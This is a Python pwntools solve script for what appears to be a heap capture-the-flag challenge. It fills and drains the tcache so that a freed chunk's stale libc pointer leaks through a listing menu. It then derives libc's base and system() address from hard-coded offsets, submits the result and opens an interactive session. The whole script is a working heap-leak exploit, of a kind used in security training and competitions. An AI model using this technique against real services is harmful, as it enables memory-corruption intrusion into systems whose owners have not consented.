#!/usr/bin/env python3
"""Heap challenge solve script (pwntools).

Drives the target's text menu over a pwntools tube, reads a pointer
leaked by menu option 3 and answers option 4 with the derived address.
The two libc offsets near the bottom are hard-coded for one specific
libc build (presumably the challenge's) and are not portable.
"""

from pwn import *
import sys

# Target: whatever argv says, else the local listener on port 1024.
args = sys.argv[1:]
if not args:
    args = ["nc", "localhost", "1024"]
io = process(args)

# Index we expect the service to give the next created entry (0-based).
# It is only ever incremented; whether the service reuses deleted ids is
# not visible from this script.
nextfree = 0


def _choose(option):
    """Wait for the menu prompt, echo it to stdout, then send *option*."""
    print(io.readuntil(b"choice? "))
    io.sendline(option)


def create(data):
    """Menu option 1: add an entry named *data* (sent raw, no newline).

    Returns the index the entry is assumed to occupy according to the
    module-level ``nextfree`` counter; the service's reply is not parsed.
    """
    global nextfree
    print("ADD", data)
    _choose(b"1")
    print(io.readuntil(b"name? "))
    io.send(data)
    this_idx = nextfree
    nextfree = this_idx + 1
    return this_idx


def delete(idx):
    """Menu option 2: delete the entry at index *idx* (sent as decimal text)."""
    print("DEL", idx)
    _choose(b"2")
    print(io.readuntil(b"id? "))
    io.sendline(str(idx).encode())


# Fill the tcache bin (7 slots) and free two more so they land in the
# unsorted bin; frees happen in reverse allocation order.
TCACHE_SLOTS = 7
for _ in range(TCACHE_SLOTS + 2):
    create(b"." * 8)
for victim in reversed(range(TCACHE_SLOTS + 2)):
    delete(victim)

# Drain the tcache so the next allocation comes from the unsorted bin.
for _ in range(TCACHE_SLOTS):
    create(b"." * 8)

# Write a single '?' over the leading null byte of the stale pointer left
# in that chunk so the listing below prints the whole value; the byte is
# subtracted back out when computing libc_base.
idx = create(b"?" * 1)

context.log_level = "DEBUG"

# Menu option 3 lists entries: skip to our index, take the rest of the
# line (minus newline) and decode it as a little-endian 64-bit value.
io.readuntil(b"choice? ")
io.sendline(b"3")
io.readuntil(f"[{idx:02}] ".encode())
leaked_line = io.readline()
addr = u64(leaked_line[:-1].ljust(8, b"\x00"))

# Undo the '?' byte, then remove the leaked pointer's (presumed) offset
# inside this libc build; the second constant is system() in the same build.
libc_base = addr - ord('?') - 0x219e00
libc_system = libc_base + 0x0000000000050d60

print(hex(addr))
print(hex(libc_system))


# Menu option 4 expects the answer as a decimal integer.
io.readuntil(b"choice? ")
io.sendline(b"4")
io.sendline(str(libc_system).encode())

io.interactive()